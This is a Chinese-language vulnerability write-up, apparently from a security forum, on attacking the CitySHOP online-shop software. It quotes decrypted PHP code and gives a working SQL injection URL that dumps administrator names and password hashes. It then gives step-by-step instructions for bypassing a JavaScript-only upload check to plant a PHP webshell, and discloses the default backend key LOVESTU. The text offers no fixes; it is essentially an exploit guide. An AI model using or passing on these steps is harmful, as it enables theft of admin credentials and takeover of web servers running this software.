|
文/My5t3ry
昨天看到论坛上有朋友问CitySHOP后台如何拿SHELL,就下了源码回来读了下,发现代码用zend加密了。
解密后读了下,漏洞还真不少,很多参数都是$_GET后就直接带入sql查询,如:
03 |
require_once( "../libs/session.inc.php" ); |
04 |
require_once( "../libs/include.inc.php" ); |
05 |
$conn = DBManager::getconnection( ); |
06 |
$thisid = $_GET['goodsid']; |
07 |
$goodsowner = $_GET['goodsowner']; |
08 |
if ( $_GET['action'] == "hit" ) |
10 |
if ( empty( $_COOKIE["goods".$thisid] ) ) |
12 |
setcookie( "goods".$thisid, "true", time( ) + $hit_cookie ); |
13 |
$conn->query( "UPDATE ".$tablepre."goods SET `goodshit`= `goodshit`+1 WHERE goodsid=".$thisid ); |
15 |
$chknum = $conn->query( "SELECT goodshit FROM ".$tablepre."goods WHERE goodsid=".$thisid ); |
16 |
$num = $chknum->fetch_assoc( ); |
17 |
echo "document.write('".$num['goodshit']."');"; |
上面的代码这句$chknum = $conn->query( "SELECT goodshit FROM ".$tablepre."goods WHERE goodsid=".$thisid );
其中的变量$thisid 未经任何过滤就带入sql,而且并没有用单引号引起来,因此gpc也不用考虑了。
exp:
http://www.t00ls.net/section/goods_script.php?action=hit&goodsid=-1 union select group_concat(adminname,0x7c,adminpwd) from stu_useradmin%23
如图:
下面说下后台获取webshell:
我们看到/lovestu_manage/chk_adv.php的20-54行
01 |
if ( $_POST['message'] == "addadv" ) |
03 |
$admation = $_POST['admation']; |
04 |
$adchicun = $_POST['adchicun']; |
05 |
$adfp = $_FILES['adfp']['name']; |
06 |
$adendtime = $_POST['adendtime']; |
07 |
$adurl = $_POST['adurl']; |
08 |
$adprice = $_POST['adprice']; |
09 |
$adtime = date( "Y-m-d H:i:s" ); |
10 |
if ( !empty( $adfp ) ) |
12 |
if ( $maxsize < $_FILES['adfp']['size'] ) |
14 |
mationbox( 2, "上传的文件超过最大限制。", 5, "back" ); |
16 |
$fpdir = "../upload/adv/"; |
17 |
if ( !file_exists( $fpdir ) ) |
21 |
$fptype = end( explode( ".", $adfp ) ); |
22 |
$fpname = str_replace( "*", "_", $adchicun )."_".time( ); |
23 |
if ( !file_exists( $fpdir.$fpname ) ) |
25 |
unlink( $fpdir.$fpname ); |
27 |
if ( !move_uploaded_file( $_FILES['adfp']['tmp_name'], $fpdir.$fpname.".".$fptype ) ) |
29 |
mationbox( 0, "上传失败!", 5, "back" ); |
32 |
$adfpname = $fpname.".".$fptype; |
33 |
$insert = $conn->query( "INSERT INTO ".$tablepre."advs (`ad_name`,`ad_fpname`,`ad_time`,`ad_endtime`,`ad_price`,`ad_url`) VALUES ('{$admation}','{$adfpname}','{$adtime}','{$adendtime}','{$adprice}','{$adurl}')" ); |
34 |
$insert ? mationbox( 1, "广告添加成功。", 2, "love_adv.php" ) : mationbox( 0, "广告添加失败!", 5, "back" ); |
上面的代码获取上传文件的后缀名后就直接保存了,并没有任何过滤,不过在edit_adv.php中却使用javascript本地效验上传文件后缀名,下面给出利用方法:
登陆后台后,访问/lovestu_manage/edit_adv.php?act=add (广告管理=>添加广告)
把源代码其中的
修改源代码
<form action="chk_adv.php" method="post" name="advform" enctype="multipart/form-data" onsubmit="return chkadvform()">
为
<form action="chk_adv.php" method="post" name="advform" enctype="multipart/form-data">
然后上传php就行了,这里建议使用firefox的firebug插件来修改,当然你也可以直接把javascript禁用或者把源代码保存到本地修改。
ps:后台登陆时需要填网站密匙,默认为LOVESTU,保存在/libs/config.inc.php中,如果修改了的话,mysql权限大点的注入点可以load_file。
|
| |
|
推荐
评论(0条)
